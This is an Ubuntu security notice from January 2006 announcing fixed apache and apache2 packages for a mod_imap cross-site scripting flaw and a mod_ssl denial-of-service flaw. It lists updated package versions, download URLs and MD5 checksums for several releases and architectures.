==========================================================Ubuntu Security Notice USN-241-1 January 12, 2006
apache2, apache vulnerabilities
CVE-2005-3352, CVE-2005-3357
==========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 4.10 (Warty Warthog)
Ubuntu 5.04 (Hoary Hedgehog)
Ubuntu 5.10 (Breezy Badger)
The following packages are affected:
apache-common
apache2-common
apache2-mpm-worker
The problem can be corrected by upgrading the affected package to
following versions:
Ubuntu 4.10:
apache-common 1.3.31-6ubuntu0.9
apache2-common 2.0.50-12ubuntu4.10
apache2-mpm-worker 2.0.50-12ubuntu4.10
Ubuntu 5.04:
apache-common 1.3.33-4ubuntu2
apache2-common 2.0.53-5ubuntu5.5
apache2-mpm-worker 2.0.53-5ubuntu5.5
Ubuntu 5.10:
apache-common 1.3.33-8ubuntu1
apache2-common 2.0.54-5ubuntu4
apache2-mpm-worker 2.0.54-5ubuntu4
In general, a standard system upgrade is sufficient to effect the
necessary changes.
Details follow:
The "mod_imap" module (which provides support for image maps) did not
properly escape the "referer" URL which rendered it vulnerable against
a cross-site scripting attack. A malicious web page (or HTML email)
could trick a user into visiting a site running the vulnerable mod_imap,
and employ cross-site-scripting techniques to gather sensitive user
information from that site. (CVE-2005-3352)
Hartmut Keil discovered a Denial of Service vulnerability in the SSL
module ("mod_ssl") that affects SSL-enabled virtual hosts with a
customized error page for error 400. By sending a specially crafted
request to the server, a remote attacker could crash the server. This
only affects Apache 2, and only if the "worker" implementation
(apache2-mpm-worker) is used. (CVE-2005-3357)
Updated packages for Ubuntu 4.10:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.50-12ubuntu4.10.diff.gz
Size/MD5: 102697 b9ab5b9b329233515fefebd4eda8f414
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.50-12ubuntu4.10.dsc
Size/MD5: 1154 821a525974e6c5a860804b7ee161bcbb
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.50.orig.tar.gz
Size/MD5: 6321209 9d0767f8a1344229569fcd8272156f8b
http://security.ubuntu.com/ubuntu/pool/main/a/apache/apache_1.3.31-6ubuntu0.9.diff.gz
Size/MD5: 372917 40492f263fea26a723e7d5ae00aa5b4b
http://security.ubuntu.com/ubuntu/pool/main/a/apache/apache_1.3.31-6ubuntu0.9.dsc
Size/MD5: 1102 f1420705a37bbe22382bdac63bd0dd4a
http://security.ubuntu.com/ubuntu/pool/main/a/apache/apache_1.3.31.orig.tar.gz
Size/MD5: 3104170 ca475fbb40087eb157ec51334f260d1b
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/main/a/apache/apache-dev_1.3.31-6ubuntu0.9_all.deb
Size/MD5: 329946 4523d5d31291fd61527e4e6fe2647a58
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-doc_1.3.31-6ubuntu0.9_all.deb
Size/MD5: 1187018 c8445132ce6680a1bedf9777d3aa5dff
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-doc_2.0.50-12ubuntu4.10_all.deb
Size/MD5: 3179114 9f8d1313218e9647e6d6922a3dd596aa
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.50-12ubuntu4.10_all.deb
Size/MD5: 164496 79203dac930d4f4cd2ef857f4a9a2e44
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.50-12ubuntu4.10_all.deb
Size/MD5: 165258 9ece4dde8a562fa1dff10234c56ad15a
amd64 architecture (Athlon64, Opteron, EM64T Xeon)
http://security.ubuntu.com/ubuntu/pool/main/a/apache/apache-common_1.3.31-6ubuntu0.9_amd64.deb
Size/MD5: 873834 566017c0c221fae1d9630309f03a219e
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-dbg_1.3.31-6ubuntu0.9_amd64.deb
Size/MD5: 9131724 39b52912a2e31b2f83cd3018ffccd55c
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-perl_1.3.31-6ubuntu0.9_amd64.deb
Size/MD5: 520978 3ca778eb1c7b1dd41a3bf89bd6c216a8
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-ssl_1.3.31-6ubuntu0.9_amd64.deb
Size/MD5: 511078 1c621fb6db54097d4a97e07d07d9d0fd
http://security.ubuntu.com/ubuntu/pool/main/a/apache/apache-utils_1.3.31-6ubuntu0.9_amd64.deb
Size/MD5: 271744 2f09954e5578ca0e1050c6f2cfd0ec98
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.50-12ubuntu4.10_amd64.deb
Size/MD5: 865442 b09ae2a626a4c7afa4bc009aff36e007
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.50-12ubuntu4.10_amd64.deb
Size/MD5: 231190 149d647db36689c3983fb2d9b422b4cc
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.50-12ubuntu4.10_amd64.deb
Size/MD5: 226334 9086722d2571d55f06d3db4fd0472742
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-threadpool_2.0.50-12ubuntu4.10_amd64.deb
Size/MD5: 229686 d0a2121f37682dd5c4a7da183e7e9ac4
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.50-12ubuntu4.10_amd64.deb
Size/MD5: 230312 d991e4bd7994c29285c76ad600b62694
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.50-12ubuntu4.10_amd64.deb
Size/MD5: 30726 64fa0d53f98651122deb4688f5e74b9f
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache_1.3.31-6ubuntu0.9_amd64.deb
Size/MD5: 398562 dc69c02fee09a9c4c74bde74cc020230
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/libapache-mod-perl_1.29.0.2.0-6ubuntu0.9_amd64.deb
Size/MD5: 491918 fbafeec1e6cacf0dabde3a53e1e2ac6f
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.50-12ubuntu4.10_amd64.deb
Size/MD5: 276242 e0fdda747b95fa35894a4d59110063af
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.50-12ubuntu4.10_amd64.deb
Size/MD5: 134180 af5cb5c7b9e0831946dc94a4961ecffe
i386 architecture (x86 compatible Intel/AMD)
http://security.ubuntu.com/ubuntu/pool/main/a/apache/apache-common_1.3.31-6ubuntu0.9_i386.deb
Size/MD5: 838782 71df372da7a56281907c9d2046d20af2
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-dbg_1.3.31-6ubuntu0.9_i386.deb
Size/MD5: 9080910 e056b1e70bff49a076ac1bd5f046843e
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-perl_1.3.31-6ubuntu0.9_i386.deb
Size/MD5: 494588 c5f7d2f9cc0a4abf45710c862d8079d0
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-ssl_1.3.31-6ubuntu0.9_i386.deb
Size/MD5: 484412 41ad993bff379577eb51576107309bbc
http://security.ubuntu.com/ubuntu/pool/main/a/apache/apache-utils_1.3.31-6ubuntu0.9_i386.deb
Size/MD5: 265552 cf1a05ca41cf8c46e7223aa713b9ccb0
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.50-12ubuntu4.10_i386.deb
Size/MD5: 826938 7e755cd6c6a1a4bbf7577e0295496655
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.50-12ubuntu4.10_i386.deb
Size/MD5: 210112 6542e2360062cb0810b8e82fbb8dd5df
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.50-12ubuntu4.10_i386.deb
Size/MD5: 206350 adbe6b4d6277c073de94dc8b212ed3f9
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-threadpool_2.0.50-12ubuntu4.10_i386.deb
Size/MD5: 208988 0ef9291233dd6ff9ef301145574aeabf
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.50-12ubuntu4.10_i386.deb
Size/MD5: 209412 cda3b9da217412248974fbcd3fc8b769
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.50-12ubuntu4.10_i386.deb
Size/MD5: 30724 1c183a30096ae610e41c25586f814d8f
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache_1.3.31-6ubuntu0.9_i386.deb
Size/MD5: 377780 a17065ef39cb3e6dec3a47fe124e78d3
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/libapache-mod-perl_1.29.0.2.0-6ubuntu0.9_i386.deb
Size/MD5: 485268 174ae6f25ad9e6f91cd7867ae8735ba7
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.50-12ubuntu4.10_i386.deb
Size/MD5: 254206 346225b4431eaf85bac9e81776fa08d2
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.50-12ubuntu4.10_i386.deb
Size/MD5: 124896 c3c18eb91ecb08130d5ed8aa22124153
powerpc architecture (Apple Macintosh G3/G4/G5)
http://security.ubuntu.com/ubuntu/pool/main/a/apache/apache-common_1.3.31-6ubuntu0.9_powerpc.deb
Size/MD5: 917906 27b01c892c39f08625db8a73df0900fa
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-dbg_1.3.31-6ubuntu0.9_powerpc.deb
Size/MD5: 9226810 aa20edbb4d5263549ab229e20547e7aa
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-perl_1.3.31-6ubuntu0.9_powerpc.deb
Size/MD5: 511680 17c6ea33be64e4d8e0f733dac38af3dd
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-ssl_1.3.31-6ubuntu0.9_powerpc.deb
Size/MD5: 507512 f6b5cf1a74d18471789dd0183ecd3632
http://security.ubuntu.com/ubuntu/pool/main/a/apache/apache-utils_1.3.31-6ubuntu0.9_powerpc.deb
Size/MD5: 278880 234b19e362da6e927c4a4aaa63b0b90d
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.50-12ubuntu4.10_powerpc.deb
Size/MD5: 904636 8302f88c861deead3efbb418c35c21ac
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.50-12ubuntu4.10_powerpc.deb
Size/MD5: 223774 ae205ac9caa54978d009eb9cd8be3cad
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.50-12ubuntu4.10_powerpc.deb
Size/MD5: 218758 64a004ab491a912a0f858753240a8a74
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-threadpool_2.0.50-12ubuntu4.10_powerpc.deb
Size/MD5: 221784 2d03fcd4695951e4424cfaa571bfc34e
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.50-12ubuntu4.10_powerpc.deb
Size/MD5: 222596 f51529d830cdedd9dd7dcf2c7f1b4aa3
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.50-12ubuntu4.10_powerpc.deb
Size/MD5: 30728 7b1c3da7137d0ab863ccdc0ec6b23825
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache_1.3.31-6ubuntu0.9_powerpc.deb
Size/MD5: 395914 b285ff09bb65bd3aa4b553c9f03454db
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/libapache-mod-perl_1.29.0.2.0-6ubuntu0.9_powerpc.deb
Size/MD5: 489458 e44725465bf4369dacb1adf7f03828de
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.50-12ubuntu4.10_powerpc.deb
Size/MD5: 269998 8589d6433af42e63a6431b028fd4bdf5
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.50-12ubuntu4.10_powerpc.deb
Size/MD5: 131506 c5cbcd6706d6d779487d598f577718b3
Updated packages for Ubuntu 5.04:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.53-5ubuntu5.5.diff.gz
Size/MD5: 109374 000706d79d9c8b28e298fa52837627db
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.53-5ubuntu5.5.dsc
Size/MD5: 1159 59e8b14a9361f3418228276dd29ec528
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.53.orig.tar.gz
Size/MD5: 6925351 40507bf19919334f07355eda2df017e5
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache_1.3.33-4ubuntu2.diff.gz
Size/MD5: 364909 889674cb6a424c468cfbc436b21b3295
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache_1.3.33-4ubuntu2.dsc
Size/MD5: 1121 6c6dcd7fb566cc06ea8e803d25dfb597
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache_1.3.33.orig.tar.gz
Size/MD5: 3105683 1a34f13302878a8713a2ac760d9b6da8
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-dev_1.3.33-4ubuntu2_all.deb
Size/MD5: 331204 2bd939db8fe498fed1e832e0d96f1199
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-doc_1.3.33-4ubuntu2_all.deb
Size/MD5: 1189264 c2cd07389b6a594be7867aab821eee3a
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-utils_1.3.33-4ubuntu2_all.deb
Size/MD5: 211952 951b9a8b77f02798ce5830ff2f3835e7
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-doc_2.0.53-5ubuntu5.5_all.deb
Size/MD5: 3578784 c660c224fcca24437abda1aa859abad6
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-threadpool_2.0.53-5ubuntu5.5_all.deb
Size/MD5: 34266 847d992bd540a3344f196bfce3d95adb
amd64 architecture (Athlon64, Opteron, EM64T Xeon)
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-common_1.3.33-4ubuntu2_amd64.deb
Size/MD5: 875210 c1a0de1cde030ecba1f0626f4b985b40
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-dbg_1.3.33-4ubuntu2_amd64.deb
Size/MD5: 9164038 1953a7036727e9f63740fec483d410e6
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-perl_1.3.33-4ubuntu2_amd64.deb
Size/MD5: 522296 b280d123d9292f5385403c36a22100b2
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-ssl_1.3.33-4ubuntu2_amd64.deb
Size/MD5: 512508 ca54187982e54d702fcf58d7c0878a92
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.53-5ubuntu5.5_amd64.deb
Size/MD5: 826574 43fb7a070010ffbeb34c493fb6754685
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.53-5ubuntu5.5_amd64.deb
Size/MD5: 221512 56710242a8a8b3f48a0a8f0f9e965daa
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.53-5ubuntu5.5_amd64.deb
Size/MD5: 217158 0ee442a4b104efde575aa1979c51e7bc
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.53-5ubuntu5.5_amd64.deb
Size/MD5: 220574 2481ccb00b4bc5305049e31d00f3037a
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.53-5ubuntu5.5_amd64.deb
Size/MD5: 167932 9e15597c23c4eafae0cb77c33e81df1a
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.53-5ubuntu5.5_amd64.deb
Size/MD5: 168714 fbc84d1ac3119a8258bb3c5fbbff5941
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.53-5ubuntu5.5_amd64.deb
Size/MD5: 93366 4f29d17cfb3136d2374d7d93f1c84ed6
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.53-5ubuntu5.5_amd64.deb
Size/MD5: 34194 d9c2454c60fd8088bcf70d8953b2f7de
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache_1.3.33-4ubuntu2_amd64.deb
Size/MD5: 399974 096267c728c4233d8aa55b34c907e507
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/libapache-mod-perl_1.29.0.3-4ubuntu2_amd64.deb
Size/MD5: 492394 620dc00a36c0eaca91231c4c3cfdb71f
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.53-5ubuntu5.5_amd64.deb
Size/MD5: 279554 d157e01efc5e8aabbf4eeb47945e2f21
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.53-5ubuntu5.5_amd64.deb
Size/MD5: 138040 ef5b1a9566b0677527d931c8c90dcecf
i386 architecture (x86 compatible Intel/AMD)
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-common_1.3.33-4ubuntu2_i386.deb
Size/MD5: 839620 aaa564735f9dc7e71d14f91d5128399e
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-dbg_1.3.33-4ubuntu2_i386.deb
Size/MD5: 9104778 c4fff1962faeaab90cd63d91b8f1d1d7
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-perl_1.3.33-4ubuntu2_i386.deb
Size/MD5: 495262 d6a22c78a4783f8bf5e41c695f539474
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-ssl_1.3.33-4ubuntu2_i386.deb
Size/MD5: 485508 556697b210bd0266d1b1a7e35eb3f352
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.53-5ubuntu5.5_i386.deb
Size/MD5: 789600 0eed4549ca3fb12996e71229bf0fd22d
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.53-5ubuntu5.5_i386.deb
Size/MD5: 201830 dcb33f94fc60b2a8cf1ef9297c8ad0c4
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.53-5ubuntu5.5_i386.deb
Size/MD5: 197578 4ec720ddc2cec8b772c44b6780b07ef0
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.53-5ubuntu5.5_i386.deb
Size/MD5: 201014 efac94b53861bc999db907163578b996
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.53-5ubuntu5.5_i386.deb
Size/MD5: 167944 4db2460ab3476b80e7858f90558245fe
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.53-5ubuntu5.5_i386.deb
Size/MD5: 168726 4b2d825987781e484a9681e0ef6996b9
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.53-5ubuntu5.5_i386.deb
Size/MD5: 91104 dcd06b7d3bfba28cd9b776f259e41023
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.53-5ubuntu5.5_i386.deb
Size/MD5: 34194 2a52039d42c4d4c7312730ddee388d12
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache_1.3.33-4ubuntu2_i386.deb
Size/MD5: 378904 fa78ca4f2736fe9eeb04f196e2a4e53a
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/libapache-mod-perl_1.29.0.3-4ubuntu2_i386.deb
Size/MD5: 485792 b2ab8ff4db993be297af3159a781ad76
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.53-5ubuntu5.5_i386.deb
Size/MD5: 257488 4f15b3f3505f637a21c73b72668fa113
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.53-5ubuntu5.5_i386.deb
Size/MD5: 128738 f1e6e5632886a8fe33d225e5092e7c28
powerpc architecture (Apple Macintosh G3/G4/G5)
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-common_1.3.33-4ubuntu2_powerpc.deb
Size/MD5: 919520 3470ca9b6836ed0c27b1c0e9b4f67e65
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-dbg_1.3.33-4ubuntu2_powerpc.deb
Size/MD5: 9253994 efebd79c8574a5a4c84e1edeca5d9ec9
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-perl_1.3.33-4ubuntu2_powerpc.deb
Size/MD5: 513232 15e5ca796f64e7bb9e1ce7e64fe780c3
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-ssl_1.3.33-4ubuntu2_powerpc.deb
Size/MD5: 509154 c569dd0a6a0a84bc386ef5eba1e4efe0
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.53-5ubuntu5.5_powerpc.deb
Size/MD5: 855930 5ad12c9e970cbb34c54de2b4af98cad8
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.53-5ubuntu5.5_powerpc.deb
Size/MD5: 214828 4aedb1d58f7393f3abbf79c248b32d5a
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.53-5ubuntu5.5_powerpc.deb
Size/MD5: 209938 d45c90319b5383b99b6933e01ea1ab23
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.53-5ubuntu5.5_powerpc.deb
Size/MD5: 213858 68e163b074d6a68151b4bfb8cd544275
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.53-5ubuntu5.5_powerpc.deb
Size/MD5: 167942 6ecb3fcfd160baa3b84a574688d9bea4
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.53-5ubuntu5.5_powerpc.deb
Size/MD5: 168714 6b0705e15135a112bc6a1706913a6c4b
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.53-5ubuntu5.5_powerpc.deb
Size/MD5: 102790 b1967ad6269cda61b99c72c1e9d480e2
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.53-5ubuntu5.5_powerpc.deb
Size/MD5: 34196 ff6fb5ff24f6dc15b63172357371e1b7
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache_1.3.33-4ubuntu2_powerpc.deb
Size/MD5: 397196 b55f344c51050420de8bd30ae1554a20
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/libapache-mod-perl_1.29.0.3-4ubuntu2_powerpc.deb
Size/MD5: 490526 6dcafd0faa774ecf409f7ec37312749c
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.53-5ubuntu5.5_powerpc.deb
Size/MD5: 272782 11651cfdb44f4ccceec53561839fdab2
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.53-5ubuntu5.5_powerpc.deb
Size/MD5: 135082 3824767a49fba2a329d08e31c50f5ac4
Updated packages for Ubuntu 5.10:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.54-5ubuntu4.diff.gz
Size/MD5: 116790 df0ce6e09b794605bc72dbaa07c6ceac
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.54-5ubuntu4.dsc
Size/MD5: 1155 ab66b3bd03d3d0fe8eadda96408918a7
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.54.orig.tar.gz
Size/MD5: 7493636 37d0d0a3e25ad93d37f0483021e70409
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache_1.3.33-8ubuntu1.diff.gz
Size/MD5: 370309 f018c73ed5af6d2a2acd74388b0cf3e5
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache_1.3.33-8ubuntu1.dsc
Size/MD5: 1109 a8c73446fb0402a49a956721f0ce74f4
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache_1.3.33.orig.tar.gz
Size/MD5: 3105683 1a34f13302878a8713a2ac760d9b6da8
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-dev_1.3.33-8ubuntu1_all.deb
Size/MD5: 331756 f3d1cf41f4ec3ef158f52556959954cc
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-doc_1.3.33-8ubuntu1_all.deb
Size/MD5: 1189834 48a529a5626746107cc6da5071abe606
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-utils_1.3.33-8ubuntu1_all.deb
Size/MD5: 212548 251bc83b92f15cc87e48d9f533ef13d3
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-doc_2.0.54-5ubuntu4_all.deb
Size/MD5: 3862902 6200801224d31a71c4cf1d44a50c4deb
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-threadpool_2.0.54-5ubuntu4_all.deb
Size/MD5: 35080 77db9b00ac5e4bbabd3c0e8679dba171
amd64 architecture (Athlon64, Opteron, EM64T Xeon)
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-common_1.3.33-8ubuntu1_amd64.deb
Size/MD5: 873236 a047157623a9c953d8aa0a33640372ec
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-dbg_1.3.33-8ubuntu1_amd64.deb
Size/MD5: 8626076 1392d88d117c3c648beca0b8bc760a3e
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-perl_1.3.33-8ubuntu1_amd64.deb
Size/MD5: 530612 6c607769117c9c74296bc438082603c3
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-ssl_1.3.33-8ubuntu1_amd64.deb
Size/MD5: 517802 1dd9562fd170cd44912f91d41ef4835d
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.54-5ubuntu4_amd64.deb
Size/MD5: 826138 5e55831358d77900f2a2ceed8d9df0d7
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.54-5ubuntu4_amd64.deb
Size/MD5: 226024 9c712624ed56fd721c27c4451e4ca074
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.54-5ubuntu4_amd64.deb
Size/MD5: 220656 45476c34759a14b76c37eb746babd7af
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.54-5ubuntu4_amd64.deb
Size/MD5: 225232 e2e50763c1c5399706900eba0e87d95d
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.54-5ubuntu4_amd64.deb
Size/MD5: 169300 20f38605e4f3868ae56945ac27c6f388
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.54-5ubuntu4_amd64.deb
Size/MD5: 170044 76b38a3efbacbb52a47aef7c93d74d38
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.54-5ubuntu4_amd64.deb
Size/MD5: 93018 1ed9bae73f6dac81f565e379fadaa32a
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.54-5ubuntu4_amd64.deb
Size/MD5: 35010 4706a9d5b7db08ea9e9d646d55a707a8
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache_1.3.33-8ubuntu1_amd64.deb
Size/MD5: 406560 6712638df37a9a6a35d4d0182dcf24ba
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/libapache-mod-perl_1.29.0.3-8ubuntu1_amd64.deb
Size/MD5: 494446 2a61cfecdee26428792c7a674eec7ae6
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.54-5ubuntu4_amd64.deb
Size/MD5: 283296 617b6b89b5f5fb7a1e02b5a4ed6d1819
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.54-5ubuntu4_amd64.deb
Size/MD5: 142696 2bddf9d1e0848a694297b6e0e1ef97c8
i386 architecture (x86 compatible Intel/AMD)
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-common_1.3.33-8ubuntu1_i386.deb
Size/MD5: 836298 cb6786f3552029a16c7ca392f6f7c341
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-dbg_1.3.33-8ubuntu1_i386.deb
Size/MD5: 8392184 6e89f3b92ad5b6cfe55d1136991fbdf4
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-perl_1.3.33-8ubuntu1_i386.deb
Size/MD5: 499024 98c2e97c1b8dbfdda4a784fdd4275051
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-ssl_1.3.33-8ubuntu1_i386.deb
Size/MD5: 489228 304d88bdede64334a01ff65fe26c2223
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.54-5ubuntu4_i386.deb
Size/MD5: 780750 60edcbe6f87ab9b9ef83c7f39db9f938
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.54-5ubuntu4_i386.deb
Size/MD5: 201254 b1879d2b6424fd74ba9cc3ba2acaf583
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.54-5ubuntu4_i386.deb
Size/MD5: 197158 8ae300065838a9a464bd4065a23d3eda
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.54-5ubuntu4_i386.deb
Size/MD5: 200710 285e9c4c914f5ecca01c2e10b67b33ea
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.54-5ubuntu4_i386.deb
Size/MD5: 169308 50cec1ff79575b208a72397dc8b7f7f3
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.54-5ubuntu4_i386.deb
Size/MD5: 170050 f87ac4324738b07aad1e98348c81c6b0
